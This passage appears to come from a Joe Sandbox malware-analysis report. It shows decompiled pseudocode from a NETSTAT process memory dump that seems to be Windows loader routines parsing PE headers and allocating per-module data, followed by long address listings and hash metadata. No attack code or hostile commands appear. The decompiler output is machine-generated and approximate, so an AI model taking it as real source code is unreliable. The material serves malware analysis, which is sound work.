																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0336E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0336EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03399730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0336E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L03368F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03393C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                0x0336d5f2
                0x0336d5f5
                0x0336d5f5
                0x0336d5fd
                0x0336d600
                0x0336d60a
                0x0336d60d
                0x0336d617
                0x0336d61d
                0x0336d627
                0x0336d62e
                0x0336d911
                0x0336d913
                0x00000000
                0x0336d919
                0x0336d919
                0x0336d919
                0x0336d634
                0x0336d634
                0x0336d634
                0x0336d634
                0x0336d640
                0x0336d8bf
                0x00000000
                0x0336d646
                0x0336d646
                0x0336d64d
                0x0336d652
                0x033bb2fc
                0x033bb2fc
                0x033bb302
                0x033bb33b
                0x033bb341
                0x00000000
                0x033bb304
                0x033bb304
                0x033bb319
                0x033bb31e
                0x033bb324
                0x033bb326
                0x033bb332
                0x033bb347
                0x033bb34c
                0x033bb351
                0x033bb35a
                0x00000000
                0x033bb328
                0x033bb328
                0x00000000
                0x033bb328
                0x033bb326
                0x0336d658
                0x0336d658
                0x0336d65b
                0x0336d665
                0x00000000
                0x0336d66b
                0x0336d66b
                0x0336d66b
                0x0336d66b
                0x0336d66d
                0x0336d672
                0x0336d67a
                0x00000000
                0x00000000
                0x0336d680
                0x0336d686
                0x0336d8ce
                0x0336d8d4
                0x0336d8dd
                0x0336d8e0
                0x0336d68c
                0x0336d691
                0x0336d69d
                0x0336d6a2
                0x0336d6a7
                0x0336d6b0
                0x0336d6b5
                0x0336d6e0
                0x0336d6b7
                0x0336d6b7
                0x0336d6b9
                0x0336d6b9
                0x0336d6bb
                0x0336d6bd
                0x0336d6ce
                0x0336d6d0
                0x0336d6d2
                0x033bb363
                0x033bb365
                0x00000000
                0x033bb36b
                0x00000000
                0x033bb36b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0336d6bf
                0x0336d6bf
                0x0336d6e5
                0x0336d6e7
                0x0336d6e9
                0x0336d6ec
                0x0336d6ec
                0x0336d6ef
                0x0336d6f5
                0x0336d6f9
                0x0336d6fb
                0x0336d6fd
                0x0336d701
                0x0336d703
                0x0336d70a
                0x0336d70a
                0x0336d701
                0x0336d710
                0x0336d710
                0x0336d6c1
                0x0336d6c1
                0x0336d6c6
                0x033bb36d
                0x033bb36f
                0x00000000
                0x033bb375
                0x033bb375
                0x033bb375
                0x00000000
                0x033bb375
                0x00000000
                0x0336d6cc
                0x0336d6d8
                0x0336d6d8
                0x0336d6d8
                0x00000000
                0x0336d6c6
                0x0336d6bf
                0x00000000
                0x0336d6da
                0x0336d6da
                0x0336d716
                0x0336d71b
                0x0336d720
                0x0336d726
                0x0336d726
                0x0336d72d
                0x00000000
                0x0336d733
                0x0336d739
                0x0336d742
                0x0336d750
                0x0336d758
                0x0336d764
                0x0336d776
                0x0336d77a
                0x0336d783
                0x0336d928
                0x0336d92c
                0x0336d93d
                0x0336d944
                0x0336d94f
                0x0336d954
                0x0336d956
                0x0336d95f
                0x0336d961
                0x0336d973
                0x0336d973
                0x0336d956
                0x0336d944
                0x0336d92c
                0x0336d78b
                0x033bb394
                0x0336d791
                0x0336d798
                0x033bb3a3
                0x033bb3bb
                0x033bb3bb
                0x0336d7a5
                0x0336d866
                0x0336d870
                0x0336d884
                0x0336d892
                0x0336d898
                0x0336d89e
                0x0336d8a0
                0x0336d8a6
                0x0336d8ac
                0x0336d8ae
                0x0336d8b4
                0x0336d8b4
                0x0336d8ae
                0x0336d7a5
                0x0336d78b
                0x0336d7b1
                0x033bb3c5
                0x033bb3c5
                0x0336d7c3
                0x0336d7ca
                0x0336d7e5
                0x0336d7eb
                0x0336d8eb
                0x0336d8ed
                0x00000000
                0x0336d8f3
                0x0336d8f3
                0x0336d8f3
                0x00000000
                0x0336d8ed
                0x0336d7cc
                0x0336d7cc
                0x0336d7d2
                0x00000000
                0x0336d7d4
                0x0336d7d4
                0x0336d7d7
                0x0336d7df
                0x033bb3d4
                0x033bb3d9
                0x033bb3dc
                0x033bb3dc
                0x033bb3df
                0x033bb3e2
                0x033bb468
                0x033bb46d
                0x033bb46f
                0x033bb46f
                0x033bb475
                0x0336d8f8
                0x0336d8f9
                0x0336d8fd
                0x033bb3e8
                0x033bb3e8
                0x033bb3eb
                0x033bb3ed
                0x00000000
                0x033bb3ef
                0x033bb3ef
                0x033bb3f1
                0x033bb3f4
                0x033bb3fe
                0x033bb404
                0x033bb409
                0x033bb40e
                0x033bb410
                0x033bb410
                0x033bb414
                0x033bb414
                0x033bb41b
                0x033bb420
                0x033bb423
                0x033bb425
                0x033bb427
                0x033bb42a
                0x033bb42d
                0x033bb42d
                0x033bb42a
                0x033bb432
                0x033bb436
                0x033bb438
                0x033bb43b
                0x033bb43b
                0x033bb449
                0x033bb44e
                0x033bb454
                0x033bb458
                0x033bb458
                0x033bb45d
                0x00000000
                0x033bb45d
                0x033bb3ed
                0x00000000
                0x00000000
                0x00000000
                0x0336d7df
                0x0336d7d2
                0x0336d7ca
                0x033bb37c
                0x033bb37e
                0x033bb385
                0x033bb38a
                0x00000000
                0x033bb38a
                0x0336d742
                0x0336d7f1
                0x0336d7f8
                0x033bb49b
                0x033bb49b
                0x0336d800
                0x0336d837
                0x0336d843
                0x0336d845
                0x0336d847
                0x0336d84a
                0x0336d84b
                0x0336d84e
                0x0336d857
                0x0336d802
                0x0336d802
                0x0336d80d
                0x00000000
                0x0336d818
                0x0336d818
                0x0336d824
                0x0336d831
                0x033bb4a5
                0x033bb4ab
                0x033bb4b3
                0x033bb4b8
                0x033bb4bb
                0x00000000
                0x033bb4c1
                0x033bb4c1
                0x033bb4c8
                0x00000000
                0x033bb4ce
                0x033bb4d4
                0x033bb4e1
                0x033bb4e3
                0x033bb4e5
                0x00000000
                0x033bb4eb
                0x033bb4f0
                0x033bb4f2
                0x0336dac9
                0x0336dacc
                0x0336dacf
                0x0336dad1
                0x0336dd78
                0x0336dd78
                0x0336dcf2
                0x00000000
                0x0336dad7
                0x0336dad9
                0x0336dadb
                0x00000000
                0x00000000
                0x0336dae1
                0x0336dae1
                0x0336dae4
                0x0336dae6
                0x033bb4f9
                0x033bb4f9
                0x033bb500
                0x0336daec
                0x0336daec
                0x0336daf5
                0x0336daf8
                0x0336dafb
                0x0336db03
                0x0336db11
                0x0336db16
                0x0336db19
                0x0336db1b
                0x033bb52c
                0x033bb531
                0x033bb534
                0x0336db21
                0x0336db21
                0x0336db24
                0x0336dcd9
                0x0336dce2
                0x0336dce5
                0x0336dd6a
                0x0336dd6d
                0x00000000
                0x0336dd73
                0x033bb51a
                0x033bb51c
                0x033bb51f
                0x033bb524
                0x00000000
                0x033bb524
                0x0336dce7
                0x0336dce7
                0x0336dce7
                0x00000000
                0x0336dce7
                0x00000000
                0x0336db2a
                0x0336db2c
                0x0336db31
                0x0336db33
                0x0336db36
                0x0336db39
                0x0336db3b
                0x0336db66
                0x0336db66
                0x0336db3d
                0x0336db3d
                0x0336db3e
                0x0336db46
                0x0336db47
                0x0336db49
                0x0336db4c
                0x0336db53
                0x0336db55
                0x0336db58
                0x0336db5a
                0x033bb50a
                0x033bb50f
                0x033bb512
                0x0336db60
                0x0336db60
                0x0336db63
                0x0336db63
                0x00000000
                0x0336db63
                0x0336db5a
                0x0336db3b
                0x0336db24
                0x0336db69
                0x0336db69
                0x0336db6c
                0x0336db6f
                0x0336db74
                0x033bb557
                0x033bb557
                0x033bb55e
                0x0336db7a
                0x0336db7c
                0x0336db7f
                0x0336db82
                0x0336db85
                0x00000000
                0x0336db8b
                0x0336db8b
                0x0336db8d
                0x0336db9b
                0x0336db9b
                0x0336db9d
                0x0336dba0
                0x0336dba2
                0x0336dba4
                0x0336dba7
                0x0336dba9
                0x0336dbae
                0x0336dbae
                0x0336dbb1
                0x0336dbb4
                0x0336dbb4
                0x0336dbb7
                0x0336dbba
                0x0336dcd2
                0x0336dcd4
                0x00000000
                0x0336dbc0
                0x0336dbc0
                0x0336dbd2
                0x0336dbd7
                0x0336dbda
                0x0336dbdd
                0x0336dbdf
                0x00000000
                0x0336dbe5
                0x0336dbe5
                0x0336dbee
                0x0336dbf1
                0x033bb541
                0x033bb544
                0x00000000
                0x033bb546
                0x033bb546
                0x00000000
                0x033bb546
                0x0336dbf7
                0x0336dbf7
                0x0336dbfd
                0x0336dbfd
                0x0336dbff
                0x0336dc0b
                0x0336dc15
                0x0336dc1b
                0x0336dc1d
                0x0336dc21
                0x0336dc21
                0x0336dc23
                0x0336dc23
                0x0336dc26
                0x0336dc29
                0x0336dc2b
                0x00000000
                0x00000000
                0x0336dc31
                0x0336dc34
                0x0336dc36
                0x0336dcbf
                0x0336dcbf
                0x0336dcc2
                0x00000000
                0x0336dc3c
                0x0336dc41
                0x0336dc43
                0x00000000
                0x0336dc45
                0x0336dc45
                0x0336dc47
                0x00000000
                0x0336dc4d
                0x0336dc4d
                0x0336dc50
                0x0336dc52
                0x0336dc55
                0x0336dcfa
                0x0336dcfe
                0x0336dd08
                0x0336dd0a
                0x0336dd0c
                0x00000000
                0x0336dd12
                0x0336dd15
                0x0336dd2d
                0x0336dd2f
                0x0336dd32
                0x0336dd35
                0x00000000
                0x0336dd35
                0x0336dc5b
                0x0336dc5b
                0x0336dc5e
                0x0336dc61
                0x0336dc64
                0x0336dc67
                0x0336dc67
                0x0336dc6a
                0x0336dc6c
                0x0336dc8e
                0x0336dc8e
                0x0336dc91
                0x0336dc93
                0x0336dcce
                0x0336dcce
                0x0336dc95
                0x0336dc9c
                0x0336dc6e
                0x0336dc72
                0x0336dc75
                0x0336dc77
                0x0336dc79
                0x033bb551
                0x033bb551
                0x00000000
                0x0336dc7f
                0x0336dc7f
                0x0336dc81
                0x00000000
                0x0336dc83
                0x0336dc86
                0x0336dc88
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0336dc88
                0x0336dc81
                0x0336dc79
                0x0336dc6c
                0x0336dc55
                0x0336dc47
                0x0336dc43
                0x00000000
                0x0336dc36
                0x0336dc23
                0x00000000
                0x0336dbff
                0x0336dbf1
                0x0336dbdf
                0x0336db8f
                0x0336db92
                0x0336db95
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0336db95
                0x0336db8d
                0x0336db85
                0x0336db74
                0x0336dc9f
                0x0336dca2
                0x0336dcb0
                0x0336dcb0
                0x0336dad1
                0x033bb4e5
                0x033bb4c8
                0x00000000
                0x00000000
                0x00000000
                0x0336d831
                0x0336d80d
                0x00000000
                0x0336d800
                0x033bb47f
                0x033bb485
                0x00000000
                0x033bb485
                0x0336d665
                0x0336d652
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0f5be7acbe953236f72759d42cf74f3c44bf7e762f55104dbd0cdeee97a9e4ef
                • Instruction ID: 72796654d29e14245ecdc26fe22151d5bd97eaaec2d2a5c81252d1f45c351e89
                • Opcode Fuzzy Hash: 0f5be7acbe953236f72759d42cf74f3c44bf7e762f55104dbd0cdeee97a9e4ef
                • Instruction Fuzzy Hash: 96E1C074B00359CFDB24DF24CDC4BA9F7B5BF45304F0881A9E909AB694DB74A981CB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0336849B Relevance: .3, Instructions: 290COMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E0336849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x342f9c0);
				E033AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3447b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0336CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03372280( *[fs:0x30], 0x3448550);
						_t139 =  *0x3447b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0338F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0336FFB0(_t193, _t235, 0x3448550);
								L5:
								return E033AD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03351C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3447b9c; // 0x0
							_t235 = L03374620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3447b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0338A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0336FFB0(_t193, _t235, 0x3448550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L033777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L033777F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3447b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3447b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E033937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3447b9c; // 0x0
									_t214 = L03374620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E033937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3447b10 =  *0x3447b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3447b04 =  *0x3447b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L033777F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L033777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3447b08 =  *0x3447b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E033957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0339F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L033777F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0338A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L033777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E033996C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                0x0336849b
                0x0336849b
                0x0336849b
                0x0336849b
                0x0336849d
                0x033684a2
                0x033684a7
                0x033684b1
                0x033684d8
                0x00000000
                0x033684b3
                0x033684c4
                0x033684c9
                0x033684cd
                0x033684cf
                0x033684cf
                0x033684d6
                0x033684e6
                0x033684e9
                0x033684ec
                0x033684ef
                0x033684f2
                0x033684f4
                0x033684fc
                0x03368501
                0x03368506
                0x03368509
                0x033686e0
                0x033686e5
                0x033686e8
                0x033686ed
                0x033686f0
                0x033686f2
                0x033b9afd
                0x033b9b02
                0x033684da
                0x033684df
                0x033684df
                0x033686fa
                0x033686fd
                0x033686fe
                0x03368701
                0x03368706
                0x03368709
                0x0336870b
                0x00000000
                0x00000000
                0x03368711
                0x03368725
                0x03368727
                0x0336872a
                0x0336872c
                0x033b9af0
                0x033b9af5
                0x03368732
                0x03368732
                0x03368732
                0x03368735
                0x03368737
                0x03368515
                0x03368515
                0x03368518
                0x0336851d
                0x03368523
                0x03368527
                0x0336852b
                0x03368537
                0x03368539
                0x0336853c
                0x0336853e
                0x0336868c
                0x03368691
                0x03368699
                0x0336869b
                0x03368744
                0x03368748
                0x033686a1
                0x033686a1
                0x033686a1
                0x033686a4
                0x033686a8
                0x033b9bdf
                0x033b9bdf
                0x033686ae
                0x033686b0
                0x00000000
                0x033686b6
                0x00000000
                0x033b9be9
                0x033686b0
                0x03368544
                0x0336854a
                0x0336854d
                0x03368551
                0x0336876e
                0x03368778
                0x0336877b
                0x03368780
                0x03368557
                0x03368557
                0x0336855d
                0x0336855d
                0x0336856b
                0x0336856e
                0x03368570
                0x03368573
                0x03368576
                0x03368576
                0x03368579
                0x0336857b
                0x00000000
                0x00000000
                0x03368581
                0x033685a0
                0x033685a2
                0x033685a5
                0x033685a7
                0x033b9b1b
                0x033b9b1b
                0x0336862e
                0x0336862e
                0x03368631
                0x03368631
                0x03368634
                0x03368636
                0x03368669
                0x03368669
                0x0336866b
                0x033b9bbf
                0x033b9bc4
                0x033b9bc8
                0x033b9bce
                0x033b9bce
                0x03368671
                0x03368671
                0x03368674
                0x03368676
                0x033b9bae
                0x033b9bae
                0x03368676
                0x0336867c
                0x0336867e
                0x03368688
                0x03368688
                0x00000000
                0x0336867e
                0x03368638
                0x03368638
                0x0336863b
                0x0336863e
                0x0336863f
                0x03368642
                0x03368645
                0x03368648
                0x0336864d
                0x033b9b69
                0x033b9b6e
                0x033b9b7b
                0x033b9b81
                0x033b9b85
                0x033b9b89
                0x033b9ba7
                0x033b9b8b
                0x033b9b91
                0x033b9b9a
                0x033b9b9f
                0x033b9b9f
                0x03368788
                0x0336878d
                0x03368763
                0x03368763
                0x03368766
                0x00000000
                0x03368766
                0x033b9b70
                0x00000000
                0x033b9b70
                0x03368656
                0x0336865a
                0x0336865c
                0x03368752
                0x03368756
                0x00000000
                0x00000000
                0x0336875e
                0x00000000
                0x0336875e
                0x03368662
                0x03368662
